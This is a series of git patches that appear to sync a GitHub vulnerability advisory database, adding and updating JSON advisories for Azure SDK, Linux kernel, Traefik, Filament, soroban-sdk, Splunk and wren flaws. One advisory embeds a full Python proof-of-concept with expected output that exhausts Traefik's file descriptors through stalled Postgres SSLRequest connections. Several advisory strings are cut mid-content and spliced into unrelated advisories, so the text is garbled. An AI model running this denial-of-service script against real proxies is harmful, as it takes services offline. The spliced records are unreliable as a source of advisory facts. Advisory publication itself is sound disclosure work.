--- a/advisories/unreviewed/2026/02/GHSA-436v-jg82-p533/GHSA-436v-jg82-p533.json
+++ b/advisories/github-reviewed/2026/02/GHSA-436v-jg82-p533/GHSA-436v-jg82-p533.json
@@ -1,11 +1,12 @@
{
"schema_version": "1.4.0",
"id": "GHSA-436v-jg82-p533",
- "modified": "2026-02-10T18:30:42Z",
+ "modified": "2026-02-12T18:28:29Z",
"published": "2026-02-10T18:30:42Z",
"aliases": [
"CVE-2026-21531"
],
+ "summary": "Azure AI Language Authoring Elevation of Privilege Vulnerability can Lead to RCE",
"details": "Deserialization of untrusted data in Azure SDK allows an unauthorized attacker to execute code over a network.",
"severity": [
{
@@ -13,12 +14,36 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "azure-ai-language-conversations-authoring"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.0.0b4"
+ }
+ ]
+ }
+ ]
+ }
+ ],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21531"
},
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/Azure/azure-sdk-for-python"
+ },
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21531"
@@ -29,8 +54,8 @@
"CWE-502"
],
"severity": "CRITICAL",
- "github_reviewed": false,
- "github_reviewed_at": null,
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-12T18:28:29Z",
"nvd_published_at": "2026-02-10T18:16:35Z"
}
}
\ No newline at end of file
From 2f5eac80446450eff30fddd5ceaf3334ec51a49f Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]"
<45398580+advisory-database[bot]@users.noreply.github.com>
Date: Thu, 12 Feb 2026 18:32:54 +0000
Subject: [PATCH 042/215] Advisory Database Sync
---
.../GHSA-3cqr-ghj9-p46w.json | 15 ++++--
.../GHSA-3pwq-c4jq-fp68.json | 15 ++++--
.../GHSA-449w-38pp-j3qp.json | 11 +++--
.../GHSA-44pm-q7mw-v83g.json | 15 ++++--
.../GHSA-4jf8-pxjc-f722.json | 11 +++--
.../GHSA-5576-c4r8-hvqj.json | 11 +++--
.../GHSA-5ww6-4m54-3jr9.json | 15 ++++--
.../GHSA-6v4x-gf5x-r6w5.json | 15 ++++--
.../GHSA-7qp5-4fvr-94mm.json | 15 ++++--
.../GHSA-cf4p-6xcv-jcrj.json | 11 +++--
.../GHSA-f95c-c99f-h2mq.json | 15 ++++--
.../GHSA-g32r-xv9q-pp8r.json | 15 ++++--
.../GHSA-h7p3-q878-x2pj.json | 15 ++++--
.../GHSA-j4wq-v2m2-959h.json | 15 ++++--
.../GHSA-jjx2-jhcm-j26c.json | 11 +++--
.../GHSA-jrv8-9m22-559m.json | 15 ++++--
.../GHSA-m48w-fr7p-r6p2.json | 11 +++--
.../GHSA-x2mg-85cj-xc8q.json | 15 ++++--
.../GHSA-2cqm-696m-6jx3.json | 6 ++-
.../GHSA-972g-439m-qvrv.json | 6 ++-
.../GHSA-jvf4-gm9f-33g9.json | 6 ++-
.../GHSA-mrvc-5w25-h6c4.json | 6 ++-
.../GHSA-wfx5-6vpf-vmpx.json | 6 ++-
.../GHSA-2cmj-fc9r-6h5j.json | 15 ++++--
.../GHSA-2hr4-372m-m24q.json | 15 ++++--
.../GHSA-2jp6-x3f3-3m72.json | 11 +++--
.../GHSA-2jw9-xm3m-75jh.json | 15 ++++--
.../GHSA-2prw-jcj2-h5xf.json | 15 ++++--
.../GHSA-2x8h-ggxv-ww4j.json | 6 ++-
.../GHSA-355c-f243-w6f5.json | 11 +++--
.../GHSA-377q-fc84-7fvf.json | 3 +-
.../GHSA-3fcr-xq7p-rffp.json | 15 ++++--
.../GHSA-3qr2-wf7p-c9f8.json | 11 +++--
.../GHSA-3rgq-74p3-8xc5.json | 6 ++-
.../GHSA-3wh2-2wc5-f45w.json | 6 ++-
.../GHSA-3ww4-528c-xcv7.json | 15 ++++--
.../GHSA-3x5q-gxp5-wv27.json | 6 ++-
.../GHSA-4gx8-h22x-pf65.json | 11 +++--
.../GHSA-649p-9q32-vwxc.json | 15 ++++--
.../GHSA-6r9h-3c6p-4chm.json | 15 ++++--
.../GHSA-7688-cfp6-gj62.json | 9 +++-
.../GHSA-77vc-xm5w-w2vq.json | 33 +++++++++++++
.../GHSA-7p49-g593-x646.json | 37 ++++++++++++++
.../GHSA-8258-fr2h-jgx8.json | 33 +++++++++++++
.../GHSA-84wm-58x3-8fvc.json | 15 ++++--
.../GHSA-8cmp-jqmx-pj7w.json | 15 ++++--
.../GHSA-926h-3qgq-9w39.json | 15 ++++--
.../GHSA-96rf-whf9-r5vh.json | 15 ++++--
.../GHSA-99pv-pwgp-5cm5.json | 15 ++++--
.../GHSA-9v69-wg3m-pj38.json | 3 +-
.../GHSA-9w8m-7cg3-7mh9.json | 36 ++++++++++++++
.../GHSA-c37x-p7mp-hh29.json | 15 ++++--
.../GHSA-c5gm-v7v7-vjx9.json | 11 +++--
.../GHSA-c6jr-3394-hq95.json | 33 +++++++++++++
.../GHSA-ccq3-qfjv-47q4.json | 36 ++++++++++++++
.../GHSA-cp3m-5wf6-4649.json | 6 ++-
.../GHSA-f24m-jwf4-xpxc.json | 15 ++++--
.../GHSA-f6c8-c5qf-mj37.json | 3 +-
.../GHSA-f7qx-wh9j-7278.json | 15 ++++--
.../GHSA-fcfm-mfmf-7xm3.json | 36 ++++++++++++++
.../GHSA-fmxw-gfwm-67w3.json | 6 ++-
.../GHSA-fqf2-x743-9564.json | 11 +++--
.../GHSA-fr6m-j2m3-hgw4.json | 36 ++++++++++++++
.../GHSA-frmq-2cmp-gh32.json | 15 ++++--
.../GHSA-g32q-3228-m26p.json | 15 ++++--
.../GHSA-ghfm-hghj-9j75.json | 33 +++++++++++++
.../GHSA-gvjm-pmwp-75mw.json | 15 ++++--
.../GHSA-h9c8-jr46-gp7p.json | 15 ++++--
.../GHSA-hfj8-gv3c-fx7w.json | 40 ++++++++++++++++
.../GHSA-hfmq-6wjv-c7r3.json | 15 ++++--
.../GHSA-hjj6-wmh2-qhwj.json | 15 ++++--
.../GHSA-j33g-vgfm-6pxv.json | 33 +++++++++++++
.../GHSA-j8xr-3xqm-72rh.json | 48 +++++++++++++++++++
.../GHSA-m4mv-q6m2-24j4.json | 15 ++++--
.../GHSA-mg2x-vmw2-xm7h.json | 15 ++++--
.../GHSA-mw3g-2cmq-pj57.json | 11 +++--
.../GHSA-p773-8mf4-rjm5.json | 44 +++++++++++++++++
.../GHSA-pc38-57g8-39gg.json | 37 ++++++++++++++
.../GHSA-pcm2-mwj5-74rq.json | 3 +-
.../GHSA-pj3r-q6m4-wfcw.json | 40 ++++++++++++++++
.../GHSA-pr6p-6x97-5c59.json | 15 ++++--
.../GHSA-q6v4-fwc8-3mpc.json | 6 ++-
.../GHSA-qg96-wxg3-3x3h.json | 15 ++++--
.../GHSA-qr83-6r38-ch55.json | 29 +++++++++++
.../GHSA-r28c-wjwj-4xgv.json | 15 ++++--
.../GHSA-r647-2xmg-2cg7.json | 3 +-
.../GHSA-r942-7mj9-p58w.json | 11 +++--
.../GHSA-rj79-m8w5-gpw8.json | 15 ++++--
.../GHSA-rmgp-99fm-wv32.json | 11 +++--
.../GHSA-v9g2-54rr-mxmg.json | 11 +++--
.../GHSA-vf98-8xxx-fp8w.json | 6 ++-
.../GHSA-xmr6-mm5f-8mf2.json | 6 ++-
.../GHSA-xp6f-p933-2gqg.json | 44 +++++++++++++++++
93 files changed, 1283 insertions(+), 229 deletions(-)
create mode 100644 advisories/unreviewed/2026/02/GHSA-77vc-xm5w-w2vq/GHSA-77vc-xm5w-w2vq.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-7p49-g593-x646/GHSA-7p49-g593-x646.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-8258-fr2h-jgx8/GHSA-8258-fr2h-jgx8.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-9w8m-7cg3-7mh9/GHSA-9w8m-7cg3-7mh9.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-c6jr-3394-hq95/GHSA-c6jr-3394-hq95.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-ccq3-qfjv-47q4/GHSA-ccq3-qfjv-47q4.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-fcfm-mfmf-7xm3/GHSA-fcfm-mfmf-7xm3.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-fr6m-j2m3-hgw4/GHSA-fr6m-j2m3-hgw4.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-ghfm-hghj-9j75/GHSA-ghfm-hghj-9j75.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-hfj8-gv3c-fx7w/GHSA-hfj8-gv3c-fx7w.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-j33g-vgfm-6pxv/GHSA-j33g-vgfm-6pxv.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-j8xr-3xqm-72rh/GHSA-j8xr-3xqm-72rh.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-p773-8mf4-rjm5/GHSA-p773-8mf4-rjm5.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-pc38-57g8-39gg/GHSA-pc38-57g8-39gg.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-pj3r-q6m4-wfcw/GHSA-pj3r-q6m4-wfcw.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-qr83-6r38-ch55/GHSA-qr83-6r38-ch55.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-xp6f-p933-2gqg/GHSA-xp6f-p933-2gqg.json
diff --git a/advisories/unreviewed/2025/10/GHSA-3cqr-ghj9-p46w/GHSA-3cqr-ghj9-p46w.json b/advisories/unreviewed/2025/10/GHSA-3cqr-ghj9-p46w/GHSA-3cqr-ghj9-p46w.json
index 81937c994b90d..057923b6fc715 100644
--- a/advisories/unreviewed/2025/10/GHSA-3cqr-ghj9-p46w/GHSA-3cqr-ghj9-p46w.json
+++ b/advisories/unreviewed/2025/10/GHSA-3cqr-ghj9-p46w/GHSA-3cqr-ghj9-p46w.json
@@ -1,13 +1,18 @@
{
"schema_version": "1.4.0",
"id": "GHSA-3cqr-ghj9-p46w",
- "modified": "2025-10-04T18:31:14Z",
+ "modified": "2026-02-12T18:30:18Z",
"published": "2025-10-04T18:31:14Z",
"aliases": [
"CVE-2023-53544"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\ncpufreq: davinci: Fix clk use after free\n\nThe remove function first frees the clks and only then calls\ncpufreq_unregister_driver(). If one of the cpufreq callbacks is called\njust before cpufreq_unregister_driver() is run, the freed clks might be\nused.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
"affected": [],
"references": [
{
@@ -32,8 +37,10 @@
}
],
"database_specific": {
- "cwe_ids": [],
- "severity": null,
+ "cwe_ids": [
+ "CWE-416"
+ ],
+ "severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-10-04T16:15:49Z"
diff --git a/advisories/unreviewed/2025/10/GHSA-3pwq-c4jq-fp68/GHSA-3pwq-c4jq-fp68.json b/advisories/unreviewed/2025/10/GHSA-3pwq-c4jq-fp68/GHSA-3pwq-c4jq-fp68.json
index 139c991480e93..72eca6535d442 100644
--- a/advisories/unreviewed/2025/10/GHSA-3pwq-c4jq-fp68/GHSA-3pwq-c4jq-fp68.json
+++ b/advisories/unreviewed/2025/10/GHSA-3pwq-c4jq-fp68/GHSA-3pwq-c4jq-fp68.json
@@ -1,13 +1,18 @@
{
"schema_version": "1.4.0",
"id": "GHSA-3pwq-c4jq-fp68",
- "modified": "2025-10-04T18:31:15Z",
+ "modified": "2026-02-12T18:30:19Z",
"published": "2025-10-04T18:31:15Z",
"aliases": [
"CVE-2023-53564"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nocfs2: fix defrag path triggering jbd2 ASSERT\n\ncode path:\n\nocfs2_ioctl_move_extents\n ocfs2_move_extents\n ocfs2_defrag_extent\n __ocfs2_move_extent\n + ocfs2_journal_access_di\n + ocfs2_split_extent //sub-paths call jbd2_journal_restart\n + ocfs2_journal_dirty //crash by jbs2 ASSERT\n\ncrash stacks:\n\nPID: 11297 TASK: ffff974a676dcd00 CPU: 67 COMMAND: \"defragfs.ocfs2\"\n #0 [ffffb25d8dad3900] machine_kexec at ffffffff8386fe01\n #1 [ffffb25d8dad3958] __crash_kexec at ffffffff8395959d\n #2 [ffffb25d8dad3a20] crash_kexec at ffffffff8395a45d\n #3 [ffffb25d8dad3a38] oops_end at ffffffff83836d3f\n #4 [ffffb25d8dad3a58] do_trap at ffffffff83833205\n #5 [ffffb25d8dad3aa0] do_invalid_op at ffffffff83833aa6\n #6 [ffffb25d8dad3ac0] invalid_op at ffffffff84200d18\n [exception RIP: jbd2_journal_dirty_metadata+0x2ba]\n RIP: ffffffffc09ca54a RSP: ffffb25d8dad3b70 RFLAGS: 00010207\n RAX: 0000000000000000 RBX: ffff9706eedc5248 RCX: 0000000000000000\n RDX: 0000000000000001 RSI: ffff97337029ea28 RDI: ffff9706eedc5250\n RBP: ffff9703c3520200 R8: 000000000f46b0b2 R9: 0000000000000000\n R10: 0000000000000001 R11: 00000001000000fe R12: ffff97337029ea28\n R13: 0000000000000000 R14: ffff9703de59bf60 R15: ffff9706eedc5250\n ORIG_RAX: ffffffffffffffff CS: 0010 SS: 0018\n #7 [ffffb25d8dad3ba8] ocfs2_journal_dirty at ffffffffc137fb95 [ocfs2]\n #8 [ffffb25d8dad3be8] __ocfs2_move_extent at ffffffffc139a950 [ocfs2]\n #9 [ffffb25d8dad3c80] ocfs2_defrag_extent at ffffffffc139b2d2 [ocfs2]\n\nAnalysis\n\nThis bug has the same root cause of 'commit 7f27ec978b0e (\"ocfs2: call\nocfs2_journal_access_di() before ocfs2_journal_dirty() in\nocfs2_write_end_nolock()\")'. For this bug, jbd2_journal_restart() is\ncalled by ocfs2_split_extent() during defragmenting.\n\nHow to fix\n\nFor ocfs2_split_extent() can handle journal operations totally by itself. \nCaller doesn't need to call journal access/dirty pair, and caller only\nneeds to call journal start/stop pair. The fix method is to remove\njournal access/dirty from __ocfs2_move_extent().\n\nThe discussion for this patch:\nhttps://oss.oracle.com/pipermail/ocfs2-devel/2023-February/000647.html",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
"affected": [],
"references": [
{
@@ -48,8 +53,10 @@
}
],
"database_specific": {
- "cwe_ids": [],
- "severity": null,
+ "cwe_ids": [
+ "CWE-617"
+ ],
+ "severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-10-04T16:15:51Z"
diff --git a/advisories/unreviewed/2025/10/GHSA-449w-38pp-j3qp/GHSA-449w-38pp-j3qp.json b/advisories/unreviewed/2025/10/GHSA-449w-38pp-j3qp/GHSA-449w-38pp-j3qp.json
index fb95dcb6b8c41..cd87b179918ad 100644
--- a/advisories/unreviewed/2025/10/GHSA-449w-38pp-j3qp/GHSA-449w-38pp-j3qp.json
+++ b/advisories/unreviewed/2025/10/GHSA-449w-38pp-j3qp/GHSA-449w-38pp-j3qp.json
@@ -1,13 +1,18 @@
{
"schema_version": "1.4.0",
"id": "GHSA-449w-38pp-j3qp",
- "modified": "2025-10-04T18:31:15Z",
+ "modified": "2026-02-12T18:30:18Z",
"published": "2025-10-04T18:31:15Z",
"aliases": [
"CVE-2023-53558"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nrcu-tasks: Avoid pr_info() with spin lock in cblist_init_generic()\n\npr_info() is called with rtp->cbs_gbl_lock spin lock locked. Because\npr_info() calls printk() that might sleep, this will result in BUG\nlike below:\n\n[ 0.206455] cblist_init_generic: Setting adjustable number of callback queues.\n[ 0.206463]\n[ 0.206464] =============================\n[ 0.206464] [ BUG: Invalid wait context ]\n[ 0.206465] 5.19.0-00428-g9de1f9c8ca51 #5 Not tainted\n[ 0.206466] -----------------------------\n[ 0.206466] swapper/0/1 is trying to lock:\n[ 0.206467] ffffffffa0167a58 (&port_lock_key){....}-{3:3}, at: serial8250_console_write+0x327/0x4a0\n[ 0.206473] other info that might help us debug this:\n[ 0.206473] context-{5:5}\n[ 0.206474] 3 locks held by swapper/0/1:\n[ 0.206474] #0: ffffffff9eb597e0 (rcu_tasks.cbs_gbl_lock){....}-{2:2}, at: cblist_init_generic.constprop.0+0x14/0x1f0\n[ 0.206478] #1: ffffffff9eb579c0 (console_lock){+.+.}-{0:0}, at: _printk+0x63/0x7e\n[ 0.206482] #2: ffffffff9ea77780 (console_owner){....}-{0:0}, at: console_emit_next_record.constprop.0+0x111/0x330\n[ 0.206485] stack backtrace:\n[ 0.206486] CPU: 0 PID: 1 Comm: swapper/0 Not tainted 5.19.0-00428-g9de1f9c8ca51 #5\n[ 0.206488] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-1.fc36 04/01/2014\n[ 0.206489] Call Trace:\n[ 0.206490] Original Description
\n\n### Summary\nA remote, unauthenticated client can bypass Traefik entrypoint `respondingTimeouts.readTimeout` by sending the 8-byte Postgres SSLRequest (STARTTLS) prelude and then stalling, causing connections to remain open indefinitely and enabling file-descriptor and goroutine exhaustion denial of service.\n\nThis triggers during protocol detection **before routing**, so it is reachable on an entrypoint even when **no Postgres/TCP routers are configured** (the PoC uses only an HTTP router).\n\n### Details\nTraefik applies per-connection deadlines based on `entryPoints.\n
\n\n\nScript (Click to expand)
\n\n```python\n#!/usr/bin/env python3\nfrom __future__ import annotations\n\nimport os\nimport socket\nimport subprocess\nimport tempfile\nimport time\nfrom typing import Final\n\n# Hardcode the Traefik binary path. Edit as needed.\nTRAEFIK_BIN: Final[str] = \"/usr/local/sbin/traefik\"\n\nHOST: Final[str] = \"127.0.0.1\"\nPORT: Final[int] = 18080\n\nSTARTUP_SLEEP_SECS: Final[float] = 2.0\nREAD_TIMEOUT_SECS: Final[float] = 2.0\nSLEEP_SECS: Final[float] = 3.5\nN_CONNS: Final[int] = 300\n\nPOSTGRES_SSLREQUEST: Final[bytes] = bytes([0x00, 0x00, 0x00, 0x08, 0x04, 0xD2, 0x16, 0x2F])\n\n\ndef fd_count(pid: int) -> int:\n return len(os.listdir(f\"/proc/{pid}/fd\"))\n\n\ndef open_idle_conns(n: int) -> list[socket.socket]:\n conns: list[socket.socket] = []\n for _ in range(n):\n conns.append(socket.create_connection((HOST, PORT)))\n return conns\n\n\ndef open_postgres_sslrequest_conns(n: int) -> list[socket.socket]:\n conns: list[socket.socket] = []\n for _ in range(n):\n s = socket.create_connection((HOST, PORT))\n s.settimeout(1.0)\n s.sendall(POSTGRES_SSLREQUEST)\n try:\n _ = s.recv(1) # typically b\"S\"\n except socket.timeout:\n pass\n conns.append(s)\n return conns\n\n\ndef close_all(conns: list[socket.socket]) -> None:\n for s in conns:\n try:\n s.close()\n except OSError:\n pass\n\n\ndef main() -> None:\n with tempfile.TemporaryDirectory(prefix=\"vh-traefik-f005-\") as td:\n dyn = os.path.join(td, \"dynamic.yml\")\n with open(dyn, \"w\", encoding=\"utf-8\") as f:\n f.write(\n f\"\"\"\\\nhttp:\n routers:\n r:\n entryPoints: [web]\n rule: \"PathPrefix(`/`)\"\n service: s\n services:\n s:\n loadBalancer:\n servers:\n - url: \"http://{HOST}:9\"\n\"\"\"\n )\n\n proc = subprocess.Popen(\n [\n TRAEFIK_BIN,\n \"--log.level=ERROR\",\n f\"--entryPoints.web.address=:{PORT}\",\n f\"--entryPoints.web.transport.respondingTimeouts.readTimeout={READ_TIMEOUT_SECS}s\",\n f\"--providers.file.filename={dyn}\",\n \"--providers.file.watch=false\",\n ],\n stdout=subprocess.DEVNULL,\n stderr=subprocess.STDOUT,\n )\n try:\n time.sleep(STARTUP_SLEEP_SECS)\n\n pid = proc.pid\n if pid is None:\n raise RuntimeError(\"Traefik PID is None\")\n\n ver = subprocess.check_output([TRAEFIK_BIN, \"version\"], text=True).strip()\n print(ver)\n print(f\"Traefik={TRAEFIK_BIN}\")\n print(f\"Host={HOST} Port={PORT} ReadTimeout={READ_TIMEOUT_SECS}s N={N_CONNS} Sleep={SLEEP_SECS}s\")\n\n base = fd_count(pid)\n print(f\"traefik_pid={pid} fd_base={base}\")\n\n idle = open_idle_conns(N_CONNS)\n fd_after_open_idle = fd_count(pid)\n print(f\"baseline_opened={N_CONNS} fd_after_open={fd_after_open_idle} delta={fd_after_open_idle - base}\")\n time.sleep(SLEEP_SECS)\n fd_after_sleep_idle = fd_count(pid)\n print(f\"baseline_after_sleep fd={fd_after_sleep_idle} delta_from_base={fd_after_sleep_idle - base}\")\n close_all(idle)\n\n pg = open_postgres_sslrequest_conns(N_CONNS)\n fd_after_open_pg = fd_count(pid)\n print(f\"candidate_opened={N_CONNS} fd_after_open={fd_after_open_pg} delta={fd_after_open_pg - base}\")\n time.sleep(SLEEP_SECS)\n fd_after_sleep_pg = fd_count(pid)\n print(f\"candidate_after_sleep fd={fd_after_sleep_pg} delta_from_base={fd_after_sleep_pg - base}\")\n close_all(pg)\n\n if (fd_after_sleep_idle - base) <= 5 and (fd_after_sleep_pg - base) >= (N_CONNS // 2):\n print(\"VULNERABLE: Postgres SSLRequest keeps connections open past entrypoint readTimeout.\")\n else:\n print(\"INCONCLUSIVE: adjust N_CONNS upward or inspect Traefik logs.\")\n finally:\n proc.terminate()\n try:\n proc.wait(timeout=3.0)\n except subprocess.TimeoutExpired:\n proc.kill()\n proc.wait(timeout=3.0)\n\n\nif __name__ == \"__main__\":\n main()\n```\n\n
\n\n### Impact\nDenial of service. Any internet-exposed entrypoint using the TCP switcher/protocol detection (including \"web\" HTTP entrypoints) with a `readTimeout` is affected; no Postgres configuration is required. At sufficient concurrency, Traefik can hit process limits (FD exhaustion/goroutine pressure/memory), taking the proxy offline.\n\nExpected output (Click to expand)
\n\n```bash\nVersion: 3.6.7\nCodename: ramequin\nGo version: go1.24.11\nBuilt: 2026-01-14T14:04:03Z\nOS/Arch: linux/amd64\nTraefik=/usr/local/sbin/traefik\nHost=127.0.0.1 Port=18080 ReadTimeout=2.0s N=300 Sleep=3.5s\ntraefik_pid=46204 fd_base=6\nbaseline_opened=300 fd_after_open=128 delta=122\nbaseline_after_sleep fd=6 delta_from_base=0\ncandidate_opened=300 fd_after_open=306 delta=300\ncandidate_after_sleep fd=306 delta_from_base=300\nVULNERABLE: Postgres SSLRequest keeps connections open past entrypoint readTimeout.\n```\n $state,\n])>
\n```\n\nAlthough these components are no longer vulnerable to this type of XSS attack, it is good practice to validate colors, and since many Filament users may be accepting color input using the `ColorPicker` form component, [additional color validation documentation was published](https://filamentphp.com/docs/3.x/forms/fields/color-picker#color-picker-validation).",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
"affected": [
{
"package": {
@@ -71,7 +76,7 @@
"cwe_ids": [
"CWE-79"
],
- "severity": "CRITICAL",
+ "severity": "MODERATE",
"github_reviewed": true,
"github_reviewed_at": "2024-09-27T20:51:01Z",
"nvd_published_at": "2024-09-27T21:15:03Z"
From f835ce7b9f868951c89aab8c4b6f063e1d723451 Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]"
<45398580+advisory-database[bot]@users.noreply.github.com>
Date: Tue, 17 Feb 2026 21:30:30 +0000
Subject: [PATCH 130/215] Publish Advisories
GHSA-4chv-4c6w-w254
GHSA-7v42-g35v-xrch
GHSA-f5p9-j34q-pwcc
---
.../GHSA-4chv-4c6w-w254.json | 120 ++++++++++++++++++
.../GHSA-7v42-g35v-xrch.json | 74 +++++++++++
.../GHSA-f5p9-j34q-pwcc.json | 66 ++++++++++
3 files changed, 260 insertions(+)
create mode 100644 advisories/github-reviewed/2026/02/GHSA-4chv-4c6w-w254/GHSA-4chv-4c6w-w254.json
create mode 100644 advisories/github-reviewed/2026/02/GHSA-7v42-g35v-xrch/GHSA-7v42-g35v-xrch.json
create mode 100644 advisories/github-reviewed/2026/02/GHSA-f5p9-j34q-pwcc/GHSA-f5p9-j34q-pwcc.json
diff --git a/advisories/github-reviewed/2026/02/GHSA-4chv-4c6w-w254/GHSA-4chv-4c6w-w254.json b/advisories/github-reviewed/2026/02/GHSA-4chv-4c6w-w254/GHSA-4chv-4c6w-w254.json
new file mode 100644
index 0000000000000..9ce39d9038fa0
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-4chv-4c6w-w254/GHSA-4chv-4c6w-w254.json
@@ -0,0 +1,120 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4chv-4c6w-w254",
+ "modified": "2026-02-17T21:29:05Z",
+ "published": "2026-02-17T21:29:05Z",
+ "aliases": [
+ "CVE-2026-26267"
+ ],
+ "summary": "The rs-soroban-sdk #[contractimpl] macro calls inherent function instead of trait function when names collide",
+ "details": "### Impact\n\nThe `#[contractimpl]` macro contains a bug in how it wires up function calls.\n\nIn Rust, you can define functions on a type in two ways:\n- Directly on the type as an inherent function:\n ```rust\n impl MyContract {\n fn value() { ... }\n }\n ```\n- Through a trait\n ```rust\n impl Trait for MyContract {\n fn value() { ... }\n }\n ```\n\nThese are two separate functions that happen to share the same name. Rust has rules for which one gets called. When you write `MyContract::value()`, Rust always picks the one defined directly on the type, not the trait version.\n\nThe bug is that `#[contractimpl]` generates code that uses `MyContract::value()` style calls even when it's processing the trait version. This means if an inherent function is also defined with the same name, the inherent function gets called instead of the trait function.\n\nThis means the Wasm-exported entry point silently calls the wrong function when two conditions are met simultaneously:\n1. A `impl Trait for MyContract` block is defined with one or more functions, with `#[contractimpl]` applied.\n2. A `impl MyContract` block is defined with one or more identically named functions, without `#[contractimpl]` applied.\n\nIf the trait version contains important security checks, such as verifying the caller is authorized, that the inherent version does not, those checks are bypassed. Anyone interacting with the contract through its public interface will call the wrong function.\n\nFor example:\n\n```rust\n#[contract]\npub struct Contract;\n\nimpl Contract {\n /// Inherent function — returns 1.\n /// Bug: The macro-generated WASM export is wired up to call this function.\n pub fn value() -> u32 {\n 1\n }\n}\n\npub trait Trait {\n fn value(env: Env) -> u32;\n}\n\n#[contractimpl]\nimpl Trait for MyContract {\n /// Trait implementation — returns 2.\n /// Fix: The macro-generated WASM export should call this function.\n fn value() -> u32 {\n 2\n }\n}\n```\n\n### Patches\n\nThe problem is patched in `soroban-sdk-macros` version **25.1.1**. The fix changes the generated call from `The Monitoring Console app is a bundled app that comes with Splunk Enterprise. It is not available for download on SplunkBase, and is not installed on Splunk Cloud Platform instances. This vulnerability does not affect [Cloud Monitoring Console](https://help.splunk.com/en/splunk-cloud-platform/administer/admin-manual/10.2.2510/monitor-your-splunk-cloud-platform-deployment/introduction-to-the-cloud-monitoring-console).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20141" + }, + { + "type": "WEB", + "url": "https://advisory.splunk.com/advisories/SVD-2026-0206" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6rjp-j8mc-4f57/GHSA-6rjp-j8mc-4f57.json b/advisories/unreviewed/2026/02/GHSA-6rjp-j8mc-4f57/GHSA-6rjp-j8mc-4f57.json new file mode 100644 index 0000000000000..2e3227d1f630e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6rjp-j8mc-4f57/GHSA-6rjp-j8mc-4f57.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6rjp-j8mc-4f57", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-2657" + ], + "details": "A vulnerability has been found in wren-lang wren up to 0.4.0. This impacts the function printError of the file src/vm/wren_compiler.c of the component Error Message Handler. Such manipulation leads to stack-based buffer overflow. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2657" + }, + { + "type": "WEB", + "url": "https://github.com/wren-lang/wren/issues/1221" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0122/blob/main/i1221/repro" + }, + { + "type": "WEB", + "url": "https://github.com/wren-lang/wren" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346455" + }, + { + 